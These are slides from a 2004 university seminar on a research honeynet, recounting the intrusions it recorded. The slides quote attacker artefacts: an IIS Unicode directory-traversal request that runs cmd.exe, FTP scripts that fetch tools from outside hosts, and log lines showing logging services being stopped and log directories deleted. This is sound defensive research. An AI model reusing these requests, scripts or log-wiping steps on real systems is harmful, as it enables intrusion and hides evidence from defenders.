UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso

1
UCD/Promia Honeynet ProjectUC Davis Security
Lab SeminarApril 28, 2004Adam Carlsonemail
ajcarlson AT ucdavis.edu
2
What is a honeypot/honeynet?

• No widely accepted definition
• Lance Spitzner defines a honeypot as... an
  information system resource whose value lies in
  unauthorized or illicit use of that resource.1
• A honeynet is a type of honeypot designed for
  research.
• 1) A honeynet is a network of multiple systems
• 2) All of the systems are real
• 1http//www.governmentsecurity.org/articles/Honeyp
  otsDefinitionsandValueofHoneypots.php

3
Why is a honeynet useful?

• Not meant to be used
• Less traffic to inspect
• No privacy issues
• Can simulate more complex network
• Proactive rather than reactive
• Tests incident response

4
Promia/UCD honeynet overview

• Currently 4 honeynet machines
• HP-1 Red Hat 9.0 Workstation Install
• HP-2 Red Hat 7.2 Server Install
• HP-3 Windows 2000 Server
• HP-4 Windows NT Server ...Connected via a
  sensor (HP-Sensor) running Red Hat 9.0

5
Configuration Specifics

• HP-1 Red Hat 9.0
• Configuration
• Workstation install
• Services
• SSH
• Syslog
• FTP
• HP-2 Red Hat 7.2
• Configuration
• Server install
• Services
• SSH
• Telnet
• Apache
• mySQL
• BIND
• FTP

6

• HP-3 Windows 2000 Server
• Configuration
• Default install with Service Pack 1
• Services
• IIS 5.0 Webserver
• IIS FTP Server
• WinVNC Virtual Network Computing server
• HP-4 Windows NT Server
• Configuration
• Default install with Service Pack 4
• Services
• IIS 3.0 Webserver
• IIS FTP Server
• WinVNC Virtual Network Computing server

7
Data Capture Methods

• Windows
• Comlog command line logging utility
• Evtsys Event Log to Syslog utility
• IIS logs
• Tcpdump traffic
• New Sebek for Windows

8

• Linux
• Sebek Kernel Module
• Remote syslog server
• Tcpdump traffic
• Tripwire

9

• Sensor Configuration
• Red Hat 9.0
• Snort 2.0 Snort-inline patch
• ACID(Analysis Console for Intrusion Databases)
  mySQL
• Bridge-utils for ethernet bridging
• OpenSSH

10
Initial Results

• Brought online on June 19, 2003
• 3 initial honeypot machines began receiving
  probes within 40 minutes of being online
• Suffered chronic worm infestation which resulted
  in 300-400 megabyte tcpdump files
• Patched against worms and created a fast and easy
  method for restoring computers

11
What took you so long?

• First attack came on June 21 at 339 pm, about 76
  hours after the honeynet was brought on line.
• Directed at Windows NT IIS web server using
  directory traversal URL.
• Uploaded privilege escalation tool named
  ErunAs2X.exe, remote shell tool nc.exe, and
  Firedaemon.exe
• Worm infestation forced us to take down system
  and reinstall the OS.

12

• Next attack was on July 3, 2003
• Directed at vulnerability in Windows 2000
  WebDAV(Web-based Distributed Authoring and
  Versioning) component of the IIS Web server
• The intruders set up a rogue ftp server listening
  on port 2687 and used it to upload software and
  music files.
• Attempted to make changes to Windows that we have
  been unable to explain

13
Why is this intruder trying to update our system
at 1226 am? ... dr-x------ 1 root root
258048 Jul 5 0039 NtServicePackUninstall d
r-x------ 1 root root 4096 Jul 5
0038 Installer -r-------- 1 root root
607 Jul 5 0026 Q815021.log -r-------- 1
root root 1518 Jul 5 0021
OEWABLog.txt dr-x------ 1 root root
4096 Jul 2 2037 Debug ... Q815021.log Servi
ce Pack started with following command line
CheckSystem ServicePack version
Mismatch DoInstallation CheckSystem Failed
0xf076 Setup has detected that the version
of the Service Pack installed on your system is
lower than what is necessary to apply this
hotfix. At minimum, you must have Service Pack 2
installed. Message displayed to the user
Setup has detected that the version of the
Service Pack installed on your system is lower
than what is necessary to apply this hotfix. At
minimum, you must have Service Pack 2
installed. User Input OK

14

• Sometime on July 5th the system crashed and was
  unable to boot back into a functioning state.
• System taken offline and restored but we did not
  correctly diagnose the attack vector
• Attackers able to compromise system only 3 hours
  after it is brought back online
• Again set up FTP server and uploaded software and
  music files
• Continued to compromise and use the machine until
  August 26th, when the WebDAV vulnerability was
  patched against.

15
Who doesnt love anonymous ftp with write
privileges?

• Anonymous connection made to Windows NT FTP
  server on July 5th at 215 am
• Checks for write permission, then uploads a file
  named 1mbtest.ptf
• Removed anonymous write permissions before
  attacker could return

16
Thanks Unicode!

• On July 19th at 1117 pm our Windows NT server
  became the target of the next attack.
• The IIS server running on the honeynet machine
  was vulnerable to a directory traversal attack
  using the Unicode encoding system
• GET /scripts/..255c..255c../winnt/system32/cmd.e
  xe?/cdirc\ HTTP/1.0
• The attacker lists the contents of all drives,
  then creates an ftp script file
• open xxx.235.254.67
• steve
• jackson
• binary
• get lsass.exe
• get serv-u.ini
• get command.exe
• get kill.exe

17

• FTP server did not accept username/password
• Eventually able to get a remote shell on port 99
  using uploaded nc.exe
• Attacker then downloads p.exe, httpodbc.dll,
  svchost.exe and serv-u.ini
• Starts Serv-U FTP daemon listing on port 1020
  using svchost.exe and serv-u.ini
• Uploads more tools via FTP before looking around
  filesystem
• Discovers hidden directory with our honeypot
  forensics tools
• Downloads all of the tools and then disconnects

18

• Come back briefly 2 times in the next week to
  check the directories they had created
• 220 am on July 29th upload and install a
  Half-Life Counterstrike game server. Attempt to
  hide directory and install game server as a
  service.
• At 330 am the game server is up and running with
  the title Super Fast California Server.
  Numerous clients immediately start connecting to
  the server.
• System taken offline at 515pm

19
HTTPS more secure right?

• Next attack came July 31st and was directed at
  Red Hat Linux 7.2 OpenSSL module used by Apache
  Web Server
• Began with a TCP connection to port 443
• Attacker then sent a bad HTTP request to port 80
  resulting in a 400 Bad Request message in
  response
• A number of connections are made to port 443 that
  contain the exploit targeting the KEY_ARG
  vulnerability found in the installed version of
  OpenSSL
• Execute a privilege elevation exploit and begin
  downloading root kit tools from a remote FTP
  server
• Install rk rootkit and hidden SSH server
  listening on port 1212

20

• Uploaded selena.tgz which contained a fast and
  simple port 443 scanner utility
• Attempted to scan several class B networks for
  machines with port 443 open.
• Many connections observed over the next few days
• Download and install psyBNC IRC place holder
  program
• System taken offline on August 5th to make image
  of harddrive. Machine would not reboot.

21
And now more fun with IIS

• Next attack targeted Microsoft IIS Server WebDAV
  SEARCH overflow vulnerability
• Began with a series of Echo Ping requests being
  sent to target at 1156 pm on Sept. 8, 2003.
• This was followed by a SEARCH request that
  exploited a vulnerability in the IIS server
  WebDAV capabilities, resulting in a remote shell
  listening on port 1055
• Attacker creates an FTP script
• open xxx.xxx.143.233
• microsoft
• microsoft
• bin
• get "ntoskrnl.exe" c\winnt\system32\cache\ntoskr
  nl.exe
• get "settingslol.jpg" c\winnt\system32\cache\set
  tingslol.jpg
• get "iislog.exe" c\winnt\system32\cache\iislog.e
  xe
• bye

22

• ntoskrnl.exe contains Serv-U FTP daemon
• settingslol.jpg contains Serv-U configuration
  file
• iislog.exe contains a program that will delete
  IIS Logs and kill processes on a Windows machine
• Attacker installs FTP server to listen on port
  2687 and uploads more tools AdmDll.dll,
  iislog.exe, nc.exe, and r_server.exe.
• Creates remote shell using nc.exe listening on
  port 1234
• Repeatedly attempts to add a new user to system
  but unsuccessful due to password policy.

23

• They then install the r_server.exe program as a
  service. r_server is the server component of the
  Remote Administrator (RA) utility
  (http//www.radmin.com/download/default.html)
• Make r_server connection from 1213 am to 1224
  am
• Finally after 15 minutes and over 40
  username/password combination the attacker gives
  up on attempting to add an account.
• Instead adds built in IWAM_HP-3 account to the
  administrator group and disconnects.

24
Too bad our hard drives come from the bargain
barn

• Connection is made to Serv-U FTP server later
  that day at 1109 am.
• Attacker immediately goes to his tools directory
  and deletes all of the uploaded files except for
  the FTP server.
• At 1113 am a connection is made from a different
  IP address. The attacker uploads and starts an
  FTP script that will download 7 DivX encoded
  movies.
• After the download starts, the attacker
  disconnects.
• Unfortunately there was only enough free space
  for one of the movies before the hard drive
  became completely filled.

25

• The full hard disk degraded performance and the
  system was taken offline at 725pm on September
  9th.
• The movie files were deleted but the rogue FTP
  server was left installed. The system was put
  back online at 1100 pm on September 15th.
• Attackers returned at 1145 pm on September 16th
  with a connection to the ftp server.
• The attackers again uploaded a number of tools
  including nc.exe, r_server.exe, and iislog.exe.
• Two more connections are made at 335 am and
  1122 pm on September 17th
• Because no new activity was being recorded,
  system was taken offline and patched against
  web-DAV vulnerability.

26
You can always count on the classics

• The next attack targeted the wu-ftpd FTP server
  running on the Red Hat 7.2 machine
• An anonymous connection is made to the FTP
  server. A connection containing an exploit of
  the fb_realpath() off-by-one vulnerability is
  then made.
• The exploit creates a remote shell and the
  attackers quickly connect
• The intruders download and install the shkit v4
  rootkit. The rootkit installs trojaned versions
  of ifconfig, ps, ls, netstat, find, top, lsof,
  slocate, dir, md5sum, syslogd, pstree and login.
  Also installs a covert SSH daemon listening on
  port 10.
• Attackers connect to the hidden SSH daemon and
  download the SucKIT v1.3b kernel-based rootkit
  and the psyBNC IRC bouncer program.

27

• Over the next two days the psyBNC IRC program is
  used heavily, but little other activity is
  observed.
• Decision was made to take the system offline
  because it looked as if it was going to be used
  for file distribution.

28
Saving the best for last

• Last intrusion began at 1145 pm on January 18th
• Directed at Windows NT MSADC component of IIS
• Attack began with a series of HTTP GET requests,
  attempting a directory traversal using the
  UNICODE encoding scheme(similar to earlier
  attack).
• Attacker then did a port scan of ports 1-3000
• Connects to anonymous FTP server and lists drive
  contents, then disconnects
• Attacker spends the next 20 minutes attacking IIS
  attempting to open a command shell
• At 1219 am the attacker issued a POST request to
  the MSADC component of the IIS web server. The
  POST was successful alerting the attacker that
  the MSADC component was installed.

29

• Attacker exploited MSADC vulnerability and at
  115 am issued a command that copied the password
  file C\winnt\repair\sam._ to the public web
  server directory, where it was then downloaded.
• The attacker then set up a rogue ftp server on
  port 1020 and a remote shell on port 99.
• Connected to the rogue ftp server, and uploaded a
  file named httpdodbc.dll. This was really the
  iiscrack exploit written by digitaloffense.net.
• At 145 am the attacker used MSADC to create a
  text file with a list of all files on the system,
  which was then downloaded.

30

• At 147 am the attacker used MSADC to copy the
  original version of cmd.exe, named cm_.exe, to
  the IIS web directory.
• Then uploaded two programs, winamp and mIRC, as
  well as a third file meant to test the target
  computers' bandwidth.
• At 329 am on January 19th, almost four hours
  after the attack began, the intruder closed all
  connections, leaving only the rogue ftp server
  running.
• A new connection was made at 551 pm that same
  day. The intruder immediately used the ftp
  server to re-open the command shell on port 99.
• The attacker then uploaded a few more tools
  before attempting to launch a Denial of Service
  attack at 607 pm

31

• After a few unsuccessful attempts, the attacker
  launched the DoS, generating over 2.14 gigabytes
  of fragmented IP packets in under 3 minutes. This
  attack continued until 950 pm.
• An attacker returned at 203 am to the rogue ftp
  server and uploaded more files, including the
  Half Life game server that we had seen in a
  previous intrusion.
• The attackers also entered the C\winnt\help\tutor
  directory, which was used to keep the ComLog
  cmd.exe shell logs. They deleted only the log
  files that had recorded their actions.
• The attacker then installed the Half-Life server,
  rebooted the machine, and disconnected at 248
  am.
• The next connection was made as 1229 am on
  January 22nd. An intruder connected to the rogue
  ftp server and uploaded a number of mp3 music
  files to the IIS web server directory.

32

• Between January 23rd and January 25th a number of
  successful requests for the mp3 files were made
  from an array of IP addresses
• Little other activity is recorded until January
  28th when another connection was made and another
  Denial of Service attack was launched using the
  mIRC program.
• Decision was made to take the system offline
  January 29th.

33
Conclusions

• Yes we will be attacked, 357,233 snort alerts and
  counting
• Able to gain tcpdump files containing actual
  exploits
• Collected real attack tools that are being used
  in the wild.
• (We received a workable exploit for the windows
  DCOM RPC vulnerability only a few months after
  the vulnerability surfaced)
• Leads to more questions

34
... why are they trying to install hardware
drivers at 1130 pm? ... 2003/07/07 213000
284.2 Munged cmdline msiinst.exe
/delayrebootq EXE name C\WINNT\System32\msiinst.
tmp\msiinst.exe The protected system file
(C\WINNT\System32\msi.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msihnd.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msimsg.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msiexec.exe) was successfully
unprotected. 2003/07/07 213535 1332.23 Driver
Install Munged cmdline C\WINNT\system32\wzcsetu
p.exe /i /P EXE name C\WINNT\system32\wzcsetup.e
xe Searching for hardware ID(s)
ms_ndisuio Enumerating files C\WINNT\inf\.inf Fo
und MS_NDISUIO in C\WINNT\inf\ndisuio.inf
Device NDIS Usermode I/O Protocol Driver NDIS
Usermode I/O Protocol Provider Microsoft Mfg
Microsoft Section Install Decorated section
name Install Selected driver installs from
section Install in c\winnt\inf\ndisuio.inf. Chang
ed class GUID of device to 4D36E975-E325-11CE-BFC
1-08002BE10318. Set selected driver. 2003/07/07
213550 1332.86 Driver Install Searching for
hardware ID(s) ms_wzcsvc Enumerating files
C\WINNT\inf\.inf Found MS_WZCSVC in
C\WINNT\inf\netwzc.inf Device Wireless
Configuration Driver Wireless Configuration
Provider Microsoft Mfg Microsoft Section
WZCSVC.ndi Decorated section name
WZCSVC.ndi Selected driver installs from section
WZCSVC.ndi in c\winnt\inf\netwzc.inf. Changed
class GUID of device to 4D36E974-E325-11CE-BFC1-0
8002BE10318. Set selected driver. 2003/07/07
213600 1484.625 Driver Install Munged cmdline
e\f7861adccd4ae\i386\update\update.exe EXE name
e\f7861adccd4ae\i386\update\update.exe Searching
for hardware ID(s) acpi\fixedbutton,fixedbutton
Found ACPI\FixedButton in C\WINNT\INF\machine.inf
Device ACPI Fixed Feature Button Driver ACPI
Fixed Feature Button Provider Microsoft Mfg
(Standard system devices) Section
NO_DRV Decorated section name NO_DRV
35
Which logging mechanisms will they go after?
TCP hp-3ftp hp-sensor.ucdavis.ed
u32822 ESTABLISHED TCP hp-3http
xxx.w80-8.abo.wanadoo.fr3938 ESTABLISHED TCP
hp-3http xxx.cs.ucdavis.edu16387
ESTABLISHED TCP hp-3http
xxx.ipt.aol.com4460 ESTABLISHED TCP
hp-3http xxx.ipt.aol.com1825
ESTABLISHED TCP hp-3http
xxx.prodigy.net.mx3201 ESTABLISHED TCP
hp-3http xxx.ppp.tiscali.fr4931
CLOSE_WAIT TCP hp-3http
xxx.18.13.1914598 ESTABLISHED TCP
hp-3http xxx.18.86.784188
ESTABLISHED TCP hp-3http
xxx.19.25.1753023 ESTABLISHED TCP
hp-3http xxx.71.179.1604550
ESTABLISHED TCP hp-31168
hp-4.ucdavis.edunetbios-ssn ESTABLISHED c\W
INNT\system32\spool\prtprocs\w32x86\prntSun Jul
20 011648 2003 services stop evtsys Sun Jul 20
011650 2003 Service evtsys stopped. Sun Jul 20
011650 2003 ... c\WINNT\system32\spool\prtprocs
\w32x86\prntSun Jul 20 011825 2003 rmdir
c\winnt\system32\logfiles /q /s Sun Jul 20
011825 2003 Sun Jul 20 011825 2003
36
Future Work

• UCD/Promia Honeynet version 2
• Honeynet goes public
• More realism create a fictitious UC Davis group
• Advertise our presence
• Develop honeynet tools
• Honeytokens

37
Thanks!

• Special thanks to Promia for making this happen
• Big thanks to Matt Bishop, Tom Ristenpart, and
  Jimmy Zhao for their constant support and help.
• Monumental thanks to Brennen Reynolds of
  Off-Piste Consulting, who was the original
  designer of this project(and my constant partner
  in crime).